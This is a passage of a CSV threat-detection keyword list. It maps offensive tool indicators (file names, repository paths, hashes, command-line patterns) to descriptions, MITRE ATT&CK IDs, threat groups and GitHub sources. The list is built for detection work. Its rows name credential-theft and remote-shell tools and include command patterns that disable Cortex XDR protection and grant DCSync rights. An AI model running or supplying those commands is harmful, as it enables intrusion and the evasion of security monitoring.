- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*CVE-2020-5902-Scanner/scanner.py*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/aqhmal/CVE-2020-5902-Scanner,1,0,N/A,N/A,1,54,22,2022-12-08T11:03:15Z,2020-07-05T06:19:09Z -*CVE-2021-34527.ps1*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cve-20220-26809_exploit.py*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*CVE-2022-21882.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve-2022-23131.py *,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/L0ading-x/cve-2022-23131,1,0,N/A,N/A,1,23,11,2022-02-22T01:45:34Z,2022-02-22T01:39:52Z -*cve-2022-26809-scanVuln.py*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*CVE-2022-30190-follina-Office-MSDT-Fixed*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*CVE-2023-20887.git*,offensive_tool_keyword,POC,VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887),T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002,TA0005 - TA0002 - TA0001 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sinsinology/CVE-2023-20887,1,1,N/A,N/A,3,219,44,2023-06-13T14:39:17Z,2023-06-13T13:17:23Z -*cve-2023-21554.nse*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - 
T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,1,N/A,N/A,,N/A,,, -*CVE-2023-23397.ps1*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,1,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*cvescanner.py*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*cyberark/ACLight*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,N/A,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*cyberark/kubesploit*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*cyberark/PipeViewer*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*cypheroth -u neo4j -p *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cytool.exe event_collection disable*,greyware_tool_keyword,cytool,Disables event collection,T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*cytool.exe protect disable*,greyware_tool_keyword,cytool,Disables protection on Cortex XDR files processes registry and services,T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*cytool.exe runtime disable*,greyware_tool_keyword,cytool,Disables Cortex XDR (Even with tamper protection enabled),T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*cytool.exe startup disable*,greyware_tool_keyword,cytool,Disables the cortex agent on startup,T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*-d kali-linux *,offensive_tool_keyword,kali,Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*D00MFist/Mystikal*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*D00Movenok/HTMLSmuggler*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*d09ccee4-pass-word-0000-98677e2356fd*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*D1rkInject.cpp*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.exe*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z 
-*D1rkInject.iobj*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.log*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.sln*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.vcxproj*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject-main*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D210570B-F1A0-4B66-9301-F7A54978C178*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win 
API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*d2hvYW1p*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*d3ckx1/Crack-allDBs*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*d494a4bc-3867-436a-93ef-737f9e0522eb*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z 
-*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*D4Vinci*,offensive_tool_keyword,Github Username,Github user: A hacker. high&low-level coder and a lot of things between. An extremely curious creature loves to learn. Break things or make things that break things.,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/D4Vinci/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*DA230B64-14EA-4D49-96E1-FA5EFED9010B*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - 
TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*dacledit.py -action write -rights DCSync -principal * -target-dn *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*daem0nc0re/PrivFu*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*dafthack/HostRecon*,offensive_tool_keyword,HostRecon,Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.,T1082 - T1087 - T1033,TA0001 - TA0007 - ,N/A,N/A,Information Gathering,https://github.com/dafthack/HostRecon,1,1,N/A,N/A,5,401,114,2017-10-03T13:25:06Z,2017-03-28T14:53:21Z -*dafthack/MailSniper*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*dafthack/MFASweep*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z -*DallasFR/Cobalt-Clip*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*DallasFR/WinShellcode*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - 
TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*DAMP-master.zip,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*DancingRightToLeft.py*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*danielbohannon*,offensive_tool_keyword,Github Username,Github user author of powershell obfuscation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/danielbohannon,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*danielmiessler/SecLists*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*danielmiessler/SecLists.git*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*DanMcInerney/Empire*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential 
Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*DanMcInerney/icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*DanMcInerney/net-creds*,offensive_tool_keyword,net-creds,Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.,T1040 - T1039 - T1036 - T1003,TA0006 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/DanMcInerney/net-creds,1,1,N/A,N/A,10,1560,443,2022-03-23T10:40:42Z,2015-01-07T18:47:46Z -*DanMcInerney/theHarvester*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*daphne-main.zip*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*daphne-x64 * pid=*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,0,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*darkarmour.py*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*darkarmour-master*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*DarkCoderSc/SharpShellPipe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*darkhotel backdoor*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*DarkHotel C2*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*darkhotel data exfil 
server*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*darkhotel_headers*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*DarkLoadLibrary-maser*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,1,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*darkr4y/geacon*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 